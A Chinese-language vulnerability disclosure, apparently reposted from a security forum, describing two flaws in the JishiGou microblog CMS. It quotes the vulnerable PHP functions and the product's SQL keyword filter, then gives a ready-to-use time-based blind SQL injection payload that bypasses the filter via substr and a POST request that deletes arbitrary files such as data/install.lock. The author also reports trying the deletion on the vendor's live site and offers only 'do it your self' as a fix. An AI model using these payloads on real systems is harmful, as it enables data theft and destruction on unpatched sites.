0x1 盲注 0x2 任意文件删除 0x1 盲注 在modules/ajax/topic.mod.php中 function Group_fields() { $uid = MEMBER_ID; $g_id = $this->Post['gid']; $touid = $this->Post['touid']; $sql="SELECT * FROM ".TABLE_PREFIX.'group'." WHERE uid =".MEMBER_ID." and id=".$g_id; $query = $this->DatabaseHandler->Query($sql); $group_info=$query->GetRow(); $sql="SELECT `uid` FROM ".TABLE_PREFIX.'members'." WHERE uid=".$touid; $query = $this->DatabaseHandler->Query($sql); $member_info=$query->GetRow(); $sql="SELECT `touid`,`display` FROM ".TABLE_PREFIX.'groupfields'." WHERE touid ='{$touid}' and gid=".$g_id; $query = $this->DatabaseHandler->Query($sql); $fields_info=$query->GetRow(); …./省略 HdhCmsTest2cto测试数据 } $gid和$touid没做过滤,直接带入查询,但是查询之前经过了CheckQuery()检测,去除了一些关键字符,但是没有去除完整。 $_config['security']['querysafe']['dfunction']['0'] = 'load_file'; $_config['security']['querysafe']['dfunction']['1'] = 'hex'; $_config['security']['querysafe']['dfunction']['2'] = 'substring'; $_config['security']['querysafe']['dfunction']['4'] = 'ord'; $_config['security']['querysafe']['dfunction']['5'] = 'char'; $_config['security']['querysafe']['daction']['0'] = 'intooutfile'; $_config['security']['querysafe']['daction']['1'] = 'intodumpfile'; $_config['security']['querysafe']['daction']['2'] = 'unionselect'; $_config['security']['querysafe']['daction']['4'] = 'unionall'; $_config['security']['querysafe']['daction']['5'] = 'uniondistinct'; $_config['security']['querysafe']['dnote']['0'] = '/'.'*'; $_config['security']['querysafe']['dnote']['1'] = '*/'; $_config['security']['querysafe']['dnote']['2'] = '#'; $_config['security']['querysafe']['dnote']['3'] = '--'; 过滤了substring(其实我才知道mysql也可以用substring),没过滤substr, 利用基于时间的盲注可以突破,最后构造一个post包,发送到ajax.php?code=group_fields 底下参数填写: gid=1 or if(substr((select nickname from jishigou_members limit 0,1),1,1)=0x61,sleep(1),1)&touid=34 最后执行的语句为: SELECT * FROM jishigou_group WHERE uid =0 and id=1 or if(substr((select nickname from jishigou_members limit 0,1),1,1)=0x61,sleep(1),1) 唉~~ 给那两个参数加个intval 把 0x2 任意文件删除 在modules/ajax/event.mod.php中 function onloadPic(){ Load::lib('image'); $image = new image(); Load::lib('upload'); unlink($this->Post['hid_pic']); if($_FILES['pic']['name']){ …省略 } …省略 } hid_pic 没经过过滤,直接被unlink,这个 漏洞 需要至少普通用户的权限 所以我们构造一个post包,提交到/ajax.php?code=onloadPic&mod=event 底下的参数填写hid_pic=want_to_delete_file 即可把相应的文件删除~ 本地测试删除data/install.lock成功,官网删除data/install.lock没成功?? 权限问题??? 修复方案: do it your self 作者 yy520
查看更多关于记事狗盲注及任意文件删除 - 网站安全 - 自学p的详细内容...